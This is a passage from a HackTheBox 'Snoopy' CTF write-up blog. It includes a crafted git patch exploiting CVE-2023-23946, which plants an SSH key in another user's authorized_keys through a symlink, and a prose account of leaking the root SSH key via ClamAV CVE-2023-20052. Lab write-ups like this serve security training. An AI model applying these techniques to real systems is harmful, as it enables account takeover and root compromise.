<div class="language-bash highlighter-rouge"><div class="code-header"><span label-text="Shell"><i class="fas fa-code small"></i></span><button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre></td><td class="rouge-code"><pre>diff <span class="nt">--git</span> a/symlink b/renamed-symlink
similarity index 100%
rename from symlink
rename to renamed-symlink
<span class="nt">--</span>
diff <span class="nt">--git</span> /dev/null b/renamed-symlink/authorized_keys
new file mode 100644
index 0000000..039727e
<span class="nt">---</span> /dev/null
+++ b/renamed-symlink/authorized_keys
@@ <span class="nt">-0</span>,0 +1,1 @@
+ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDn76zZKBkOP+bame5OO1cXGsn91xbO5NPO5H4XqCpGIiDqDMA0Vzpqb9MtNHOYu3tqtqDSe9moL3x/X/s9qYTlTvJjM05WJyZ1e1zy6w60GRTx1ZbyTxe4sOFesYFASsUwptnAE9ZK/+ea0OqrB0gbvpgjsmIqgNlTld8FXwV+wkoA9G9KKUzXPeb0ogWNoWRiZLsjdlz0YHqOOO52wXRtasE0HTiWeadP/5xkkjXH8C5hZ+2Vath9+ZOiMmbZFewRG3YryT6uWETHwQCJA4N0vaN2HgUuPO/HoIBvy05fyQPv5M1Tz8rlgiHobdl6/MvhhhYzza4qDJDmGVd+XNbU7xJAZ7Fzx7ekaiVSXy8meS3ScAAbX5DFrvAxx6Z6HwLPGFk1C0hG1/5lYsF0m90PGdhfVmrzNs2+5tVWnc/7MawNEBQ8YnZm7vflo03Va+BEUw3lD1SlXtJj6lAqDf5sAkxvYKerHntFvo/T6xUy17gyuQ6CJPPtgL9esik9kFs<span class="o">=</span> agent47@debian
</pre></td></tr></tbody></table></code></div></div>

<p>I uploaded it to <code class="language-plaintext highlighter-rouge">/dev/shm/patch</code> and created a symlink to <code class="language-plaintext highlighter-rouge">/home/sbrown/.ssh</code> as <code class="language-plaintext highlighter-rouge">symlink</code>;</p>

<p><img data-src="/assets/img/Pasted image 20230830224340.png" alt="" data-proofer-ignore></p>

<p>The patch applied successfully, and I was able to login;</p>

<p><img data-src="/assets/img/Pasted image 20230830224431.png" alt="" data-proofer-ignore></p>

<hr />

<p><br /></p>

<h3 id="privesc">PrivEsc<a href="#privesc" class="anchor"><i class="fas fa-hashtag"></i></a></h3></h3>
<p><br /></p>

<p>User <code class="language-plaintext highlighter-rouge">sbrown</code> has sudo permissions to run <code class="language-plaintext highlighter-rouge">clamscan</code>, which is the utility for ClamAV for running virus scan on the filesystem. Searching for known vulnerabilities lead me to <a href="https://onekey.com/blog/clamav-critical-patch-review/">this blog</a>, which mentioned <strong>CVE-2023-20052</strong>. Using this <a href="https://github.com/nokn0wthing/CVE-2023-20052">PoC</a>, I was able to generate a <code class="language-plaintext highlighter-rouge">.dmg</code> file that loads <code class="language-plaintext highlighter-rouge">/root/.ssh/id_rsa</code>, which gave me the root SSH key;</p>

<p><img data-src="/assets/img/Pasted image 20230830225117.png" alt="" data-proofer-ignore>
<img data-src="/assets/img/Pasted image 20230830225210.png" alt="" data-proofer-ignore>
<img data-src="/assets/img/Pasted image 20230830225304.png" alt="" data-proofer-ignore></p>

<hr />

<p><br /></p>

<h3 id="summary">Summary<a href="#summary" class="anchor"><i class="fas fa-hashtag"></i></a></h3></h3>
<p><br /></p>

<ul>
  <li>NMAP showed port <strong>22</strong>, <strong>53</strong>, and <strong>80</strong></li>
  <li>Exploited an LFI on the website to leak the key of <strong>BIND</strong></li>
  <li>Hijacked the mail domain for account takeover on <em>Mattermost</em>;
    <ul>
      <li>Exploit a custom command to capture SSH creds of <code class="language-plaintext highlighter-rouge">cbrown</code></li>
    </ul>
  </li>
  <li>Inside the box as <code class="language-plaintext highlighter-rouge">cbrown</code>;
    <ul>
      <li>Exploited <strong>CVE-2023-23946</strong> (git apply) to gain access to <code class="language-plaintext highlighter-rouge">sbrown</code></li>
    </ul>
  </li>
  <li>Inside the box as <code class="language-plaintext highlighter-rouge">sbrown</code>;
    <ul>
      <li>Exploited <em>ClamAV</em> (<strong>CVE-2023-20052</strong>) to leak root SSH key.</li>
    </ul>
  </li>
</ul>

</div>

<div class="post-tail-wrapper text-muted">

  <!-- categories --><div class="post-meta mb-3">
    <i class="far fa-folder-open fa-fw mr-1"></i><a href='/categories/hackthebox/'>hackthebox</a></div><!-- tags --><div class="post-tags">
    <i class="fa fa-tags fa-fw mr-1"></i><a href="/tags/hackthebox/"
          class="post-tag no-text-decoration" >hackthebox</a><a href="/tags/hard/"
          class="post-tag no-text-decoration" >hard</a><a href="/tags/linux/"
          class="post-tag no-text-decoration" >linux</a><a href="/tags/web/"
          class="post-tag no-text-decoration" >web</a><a href="/tags/dns/"
          class="post-tag no-text-decoration" >dns</a><a href="/tags/bind/"
          class="post-tag no-text-decoration" >bind</a><a href="/tags/lfi/"
          class="post-tag no-text-decoration" >lfi</a><a href="/tags/domain-takeover/"
          class="post-tag no-text-decoration" >domain takeover</a><a href="/tags/account-takeover/"
          class="post-tag no-text-decoration" >account takeover</a><a href="/tags/mattermost/"
          class="post-tag no-text-decoration" >mattermost</a><a href="/tags/paramiko/"
          class="post-tag no-text-decoration" >paramiko</a><a href="/tags/git/"
          class="post-tag no-text-decoration" >git</a><a href="/tags/git-apply/"
          class="post-tag no-text-decoration" >git apply</a><a href="/tags/clamscan/"
          class="post-tag no-text-decoration" >clamscan</a><a href="/tags/clamav/"
          class="post-tag no-text-decoration" >clamav</a><a href="/tags/cve-2023-20052/"
          class="post-tag no-text-decoration" >CVE-2023-20052</a></div><div class="post-tail-bottom
    d-flex justify-content-between align-items-center mt-3 pt-5 pb-2">
    <div class="license-wrapper">This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a> by the author.</div><!--
 Post sharing snippet
-->

<div class="share-wrapper">
  <span class="share-label text-muted mr-1">Share</span>
  <span class="share-icons"><a href="https://twitter.com/intent/tweet?text=Snoopy - HackTheBox - 4g3nt47&url=https://4g3nt47.github.io/posts/hackthebox/snoopy.html" data-toggle="tooltip" data-placement="top"
          title="Twitter" target="_blank" rel="noopener" aria-label="Twitter">
          <i class="fa-fw fab fa-twitter"></i>
        </a><a href="https://www.facebook.com/sharer/sharer.php?title=Snoopy - HackTheBox - 4g3nt47&u=https://4g3nt47.github.io/posts/hackthebox/snoopy.html" data-toggle="tooltip" data-placement="top"
          title="Facebook" target="_blank" rel="noopener" aria-label="Facebook">
          <i class="fa-fw fab fa-facebook-square"></i>
        </a><a href="https://telegram.me/share?text=Snoopy - HackTheBox - 4g3nt47&url=https://4g3nt47.github.io/posts/hackthebox/snoopy.html" data-toggle="tooltip" data-placement="top"
          title="Telegram" target="_blank" rel="noopener" aria-label="Telegram">
          <i class="fa-fw fab fa-telegram"></i>
        </a><i id="copy-link" class="fa-fw fas fa-link small"
        data-toggle="tooltip" data-placement="top"
        title="Copy link"
        title-succeed="Link copied successfully!">
    </i>

  </span>
</div>
</div><!-- .post-tail-bottom -->

</div><!-- div.post-tail-wrapper -->

</div>
  </div> <!-- #core-wrapper -->

  <!-- pannel -->
  <div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down">

    <div class="access"><!--<div id="access-tags">
    <div class="panel-heading">Trending Tags</div>
    <div class="d-flex flex-wrap mt-3 mb-1 mr-3"><a class="post-tag" href="/tags/hackthebox/">hackthebox</a><a class="post-tag" href="/tags/linux/">linux</a><a class="post-tag" href="/tags/web/">web</a><a class="post-tag" href="/tags/static-analysis/">static analysis</a><a class="post-tag" href="/tags/command-injection/">command injection</a><a class="post-tag" href="/tags/custom-exploitation/">custom exploitation</a><a class="post-tag" href="/tags/lfi/">lfi</a><a class="post-tag" href="/tags/dvwa/">dvwa</a><a class="post-tag" href="/tags/python/">python</a><a class="post-tag" href="/tags/rce/">rce</a></div>
  </div>-->
    </div><!-- BS-toc.js will be loaded at medium priority -->
<script src="/assets/js/bootstrap-toc.min.js"></script>

<div id="toc-wrapper" class="pl-0 pr-4 mb-5">
  <div class="panel-heading pl-3 pt-2 mb-2">Contents</div>
  <nav id="toc" data-toggle="toc"></nav>
</div></div>

</div>

<!-- tail --><div class="row">
  <div class="col-12 col-lg-11 col-xl-8">
    <div id="tail-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><!--
 Recommend the other 3 posts according to the tags and categories of the current post,
 if the number is not enough, use the other latest posts to supplement.
-->

<!-- The total size of related posts  --><!-- An random integer that bigger than 0  --><!-- Equals to TAG_SCORE / {max_categories_hierarchy}  --><!-- Fill with the other newlest posts  --><div id="related-posts" class="mt-5 mb-2 mb-sm-4">
    <h3 class="pt-2 mt-1 mb-4 ml-1"
      data-toc-skip>Further Reading</h3>
    <div class="card-deck mb-4"><div class="card">
        <a href="/posts/hackthebox/cyberapoc_23.html">
          <div class="card-body"><!--
  Date format snippet
  See: ${JS_ROOT}/utils/timeago.js
--><em class="timeagosmall"
    date="2023-03-23 00:00:00 +0100">Mar 23</em>
<h3 class="pt-0 mt-1 mb-3" data-toc-skip>Cyber Apocalypse 2023 - HackTheBox</h3>
            <div class="text-muted small">
              <p>Cyber Apocalypse 2023 is a very nice jeopardy-style CTF competition hosted by HackTheBox. It was a 5-day CTF played between 19th - 23rd March, 2023. This is a write-up on some of the challenges tha...
              </p>
            </div>
          </div>
        </a>
      </div><div class="card">
        <a href="/posts/hackthebox/agile.html">
          <div class="card-body"><!--
  Date format snippet
  See: ${JS_ROOT}/utils/timeago.js
--><em class="timeagosmall"
    date="2023-08-05 00:00:00 +0100">Aug  5</em>
<h3 class="pt-0 mt-1 mb-3" data-toc-skip>Agile - HackTheBox</h3>
            <div class="text-muted small">
              <p>Agile is a medium linux box by 0xdf featuring a simple web-based LFI that could be used to bypass PIN validation in the Werkzeug debug console. Once on the box, you’ll recover some creds from a MyS...
              </p>
            </div>
          </div>
        </a>
      </div><div class="card">
        <a href="/posts/hackthebox/dynstr.html">
          <div class="card-body"><!--
  Date format snippet
  See: ${JS_ROOT}/utils/timeago.js
--><em class="timeagosmall"
    date="2021-10-20 00:00:00 +0100">Oct 20, 2021</em>
<h3 class="pt-0 mt-1 mb-3" data-toc-skip>Dynstr - HackTheBox</h3>
            <div class="text-muted small">
              <p>Dynstr, a cool medium-rated linux box that’s all about DNS (as you probably guessed from the name). It features a web service that allows you to update DNS records on the server. One of the paramet...
              </p>
            </div>
          </div>
        </a>
      </div></div> <!-- .card-deck -->
  </div> <!-- #related-posts --><!--
  Navigation buttons at the bottom of the post.
-->

<div class="post-navigation d-flex justify-content-between"><a href="/posts/hackthebox/monitorstwo.html" class="btn btn-outline-primary"
    prompt="Older">
    <p>MonitorsTwo - HackTheBox</p>
  </a><a href="/posts/hackthebox/format.html" class="btn btn-outline-primary"
    prompt="Newer">
    <p>Format - HackTheBox</p>
  </a></div>
<!--  The comments switcher --></div>
  </div>
</div> <!-- .row --><!--
  The Footer
-->

<footer class="d-flex w-100 justify-content-center">
  <div class="d-flex justify-content-between align-items-center text-muted">
    <div class="footer-left">
      <p class="mb-0">
        © 2023
        <a href="https://twitter.com/UmarAbdoul">Umar Abdul</a>.<span data-toggle="tooltip" data-placement="top"
          title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p>
    </div>

    <div class="footer-right">
      <p class="mb-0">Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme.

      </p>
    </div>

  </div> <!-- div.d-flex -->
</footer>
</div><!--
  The Search results
-->
<div id="search-result-wrapper" class="d-flex justify-content-center unloaded">
  <div class="col-12 col-sm-11 post-content">
    <div id="search-hints"><div id="access-tags">
    <div class="panel-heading">Trending Tags</div>
    <div class="d-flex flex-wrap mt-3 mb-1 mr-3"><a class="post-tag" href="/tags/hackthebox/">hackthebox</a><a class="post-tag" href="/tags/linux/">linux</a><a class="post-tag" href="/tags/web/">web</a><a class="post-tag" href="/tags/static-analysis/">static analysis</a><a class="post-tag" href="/tags/command-injection/">command injection</a><a class="post-tag" href="/tags/custom-exploitation/">custom exploitation</a><a class="post-tag" href="/tags/lfi/">lfi</a><a class="post-tag" href="/tags/dvwa/">dvwa</a><a class="post-tag" href="/tags/python/">python</a><a class="post-tag" href="/tags/rce/">rce</a></div>
  </div></div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>
</div> <!-- #main-wrapper --><div id="mask"></div>

    <a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button">
      <i class="fas fa-angle-up"></i>
    </a><!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
--><script src="/assets/js/simple-jekyll-search.min.js"></script>

<script>
SimpleJekyllSearch({
  searchInput: document.getElementById('search-input'),
  resultsContainer: document.getElementById('search-results'),
  json: '/assets/js/data/search.json',
  searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0">  <a href="{url}">{title}</a>  <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">    {categories}    {tags}  </div>  <p>{snippet}</p></div>',
  noResultsText: '<p class="mt-5">Oops! No result founds.</p>',
  templateMiddleware: function(prop, value, template) {
    if (prop === 'categories') {
      if (value === '') {
        return `${value}`;
      } else {
        return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
      }
    }

    if (prop === 'tags') {
      if (value === '') {
        return `${value}`;
      } else {
        return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
      }
    }
  }
});
</script>
<!--
  JS selector for site.
-->

<!-- layout specified --><!-- image lazy-loading & popup -->
  <script src="/assets/js/clipboard.min.js"></script><script defer src="/assets/js/dist/post.min.js"></script><!-- commons -->

<script src="/assets/js/bootstrap.min.js"></script></body>

</html>
